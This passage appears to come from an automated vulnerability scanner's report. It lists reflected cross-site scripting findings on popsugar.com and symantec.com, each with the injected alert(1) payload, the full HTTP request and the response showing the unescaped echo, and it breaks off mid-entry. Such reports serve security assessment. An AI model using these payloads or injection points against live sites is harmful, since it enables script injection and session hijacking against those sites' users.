Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216634
Date: Mon, 12 Sep 2011 12:48:06 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831686%7CpkptR%2FA9J%2FIqOT1%2FNXZ2n3QzQ3z9KzL8JzqNOXzhPCUOXdBu6NS1b%2F3LUa8GKOLImxVmk7YfvLibUFzSqe5Q%2B7%2BoVuuMa7MtnWxeLZvLkI0rcDOFt58RkZNzXW2qbFry5plWRfKYqFDBw4BBEwsyl3s5Am93doYXCHQyo1EcDOCL1roLiKJwo2kG02GMlhGxN7k3D4PUL585q5xETKDblw%3D%3D%7C429f67101424c290012240d8a56cca4712884354; expires=Wed, 05-Oct-2011 16:21:26 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/ajaxharness1274b"-alert(1)-"faa5baba69b",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.133. http://www.popsugar.com/community/welcome [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71fc3"-alert(1)-"b26aaabc6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community71fc3"-alert(1)-"b26aaabc6d1/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 214880
Date: Mon, 12 Sep 2011 12:48:13 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831693%7Cr9dhWypY6jg0x26vr4FaUOqhCsFOKHx5a%2Bq2ZDd%2BTfxw08HKOoJMNBXIB2hhcFDYnBzwi8s3IVNfYgNmYEw%2BLksmQfw08uQ6pxsGEBhnj9JcmGg5BFRhwDUwk88E51%2BnDwBluagi98uxF2qU8Lcnq%2BREdgQf3pT2oh7xtrjQAcl9H8hYmTA%2FNyOK2rW22dQT%2B5nTWh2raVfAbMmHLd%2Fk%2BQ%3D%3D%7C7aa075b627ef874e5acd15c901cd009ba793cf8b; expires=Wed, 05-Oct-2011 16:21:33 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community71fc3"-alert(1)-"b26aaabc6d1/welcome",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.134. http://www.popsugar.com/community/welcome [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dc10"><script>alert(1)</script>52e78853112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community8dc10"><script>alert(1)</script>52e78853112/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web019-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 215025
Date: Mon, 12 Sep 2011 12:48:11 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831691%7CEDANpUBXj7Tgv43AmGrEhzEQXWyNeG0H2zRof%2FnyvlEl%2BPoC%2FCdYmxgnkumTYWRDyf16qQRZZWKmfWgsLDfCNJztLyezVjGPrXBnIdPU%2FijnixGFkQYw17y9MdoPtfcAKuYEXGj1y6pmNeONBafiaAclYS69eompF4MBmzqpl6ELuA2SXF9YYcuAaG5rOfCALG8nlaGApmcVl%2FDZLDHLpw%3D%3D%7Cdc8ded20b853356648daf3e5c9a44561e3044fcd; expires=Wed, 05-Oct-2011 16:21:31 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community8dc10"><script>alert(1)</script>52e78853112/welcome">
...[SNIP]...

2.135. http://www.popsugar.com/community/welcome [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9aea"-alert(1)-"a554c76626d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/welcomef9aea"-alert(1)-"a554c76626d HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 149935
Date: Mon, 12 Sep 2011 12:49:00 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831740%7CPBu6CHBL%2BNPiJ%2BO0b88VGrbPoavruFNqnmlHvuiyu5RAZ8RbrX4MARzW6UPUI4XAzUuUWIKcevcUd75sOIG7vbWCJmfKPIEgOL7cKSF5iS4%2FtvU79e%2BjOKK3juIM7eHeBEDUqSSYOB%2Bm3H7BlJevZtX6AFsSQFzsbM7h9PjEi57L3o59zDb70XFiwzNQNbEBhkqvX%2F5U2G%2B34iy8gxYO4g%3D%3D%7C6dabb54501a683def6c8a84c7f24d6fa0e681d28; expires=Wed, 05-Oct-2011 16:22:20 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community/welcomef9aea"-alert(1)-"a554c76626d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.136. http://www.popsugar.com/community/welcome [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e939"><script>alert(1)</script>5f0bb92b79e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/welcome4e939"><script>alert(1)</script>5f0bb92b79e HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 150250
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831703%7CoAutIUEcXq6bCNfw74vX3a0be04ZbR4xtUo1MkM2Wd11jXYyJcUAEBZW4wg1XBM9frctMhBcgKvcWELTBl%2FmSMz8iU8UXP3HuedsTL3oNeYUELTy8uSkwVNdGNj8TtYYoOq1UoQzUrLsQjAK6FKYwd2IUdA5MzeD0wF3ZgDFwzcJUej1ChSFZzPRc1Svasm3z2LxMdUMOWcSToydDAcpMg%3D%3D%7Cce8ce4960372de566ad8f2cb9b30c00a80876c77; expires=Wed, 05-Oct-2011 16:21:43 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community/welcome4e939"><script>alert(1)</script>5f0bb92b79e">
...[SNIP]...

2.137. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de3fe'-alert(1)-'2de55c2ee7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:14 +0000
Vary: Cookie
ETag: "1315831694"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777241
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.138. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ada'-alert(1)-'a74af1a6694 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:18 +0000
Vary: Cookie
ETag: "1315831698"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777346
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.139. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b374'-alert(1)-'f947be7dc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:22 +0000
Vary: Cookie
ETag: "1315831702"
Content-Type: text/html; charset=utf-8
Content-Length: 29494
X-Varnish: 1371255077
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.140. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e5b9'-alert(1)-'74a67864f83 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:28 +0000
Vary: Cookie
ETag: "1315831708"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777530
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.141. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05b9'-alert(1)-'cfeabf464ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:32 +0000
Vary: Cookie
ETag: "1315831712"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777597
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.142. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69951'-alert(1)-'8f65520acae was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:36 +0000
Vary: Cookie
ETag: "1315831716"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777663
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.143. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

